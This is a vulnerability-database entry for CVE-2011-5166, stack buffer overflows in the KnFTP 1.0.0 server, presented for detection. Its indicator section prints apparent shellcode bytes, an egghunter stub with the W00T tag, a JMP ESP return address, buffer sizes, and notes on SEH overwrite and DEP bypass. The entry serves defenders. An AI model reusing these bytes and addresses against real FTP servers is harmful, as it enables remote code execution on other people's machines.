cbcvebase.
CVE-2011-5166
published 2012-09-15

CVE-2011-5166: Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN…

PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.48%
92.9th percentile
Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN, (4) QUIT, (5) PORT, (6) PASV, (7) TYPE, (8) STRU, (9) MODE, (10) RETR, (11) STOR, (12) APPE, (13) ALLO, (14) REST, (15) RNFR, (16) RNTO, (17) ABOR, (18) DELE, (19) CWD, (20) LIST, (21) NLST, (22) SITE, (23) STST, (24) HELP, (25) NOOP, (26) MKD, (27) RMD, (28) PWD, (29) CDUP, (30) STOU, (31) SNMT, (32) SYST, and (33) XPWD commands.

Affected

1 ranges
VendorProductVersion rangeFixed in
elif_keirknftp

Detection & IOCsextracted from sources · hover to see the quote

filenameknftpd.exe
otheregg: \x54\x30\x30\x57\x54\x30\x30\x57 (W00TW00T)
otherJMP ESP @ 0x7C874413 (kernel32.dll)
commandUSER <long_string>
commandPASS <overflow_buffer>
commandPWD <9000-byte buffer>
bytes
\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18\x9c\x61
bytes
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
  • Detect oversized FTP command arguments: alert on any FTP command (USER, PASS, RETR, STOR, MKD, PWD, CWD, etc.) with argument length exceeding ~271 bytes, which is the documented shellcode buffer space.
  • Detect the W00T egghunter tag in FTP traffic; the double-tag pattern 'W00TW00T' (bytes \x54\x30\x30\x57\x54\x30\x30\x57) in a PASS command payload is a strong indicator of exploitation.
  • Monitor for FTP PASS commands containing large NOP sleds (\x90 repeated) followed by shellcode bytes, indicative of stack-based buffer overflow exploitation against KnFTP.
  • Flag FTP sessions sending 9000+ byte buffers to any FTP command (e.g., PWD), as this is the documented crash/DoS payload size for KnFTP SEH overwrite.
  • knftpd.exe is the only non-SafeSEH module in KnFTP; process-level monitoring for knftpd.exe spawning unexpected child processes (e.g., calc.exe, cmd.exe) indicates successful exploitation.
  • Vulnerable FTP commands include MKD, LS (NLST), ABOR, CD (CWD), APPE, REST, PWD — monitor all of these for abnormally long arguments on port 21.
  • ·ROP gadget addresses and .data section addresses are specific to Windows XP SP2/SP3 Spanish and Windows 7 Professional SP1 Spanish builds of msvcrt.dll; they will not apply to other language versions or patch levels.
  • ·The JMP ESP EIP overwrite address (0x7C874413 in kernel32.dll) is specific to Windows XP SP3; this address will differ on other OS versions or service packs.
  • ·The DoS/SEH PoC was tested with DEP disabled; exploitation reliability changes when DEP is enabled (the Metasploit module specifically addresses DEP bypass via ROP).
  • ·The exploit overwrites EIP with smaller payloads but switches to SEH overwrite with larger payloads; detection thresholds should account for both overflow sizes.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.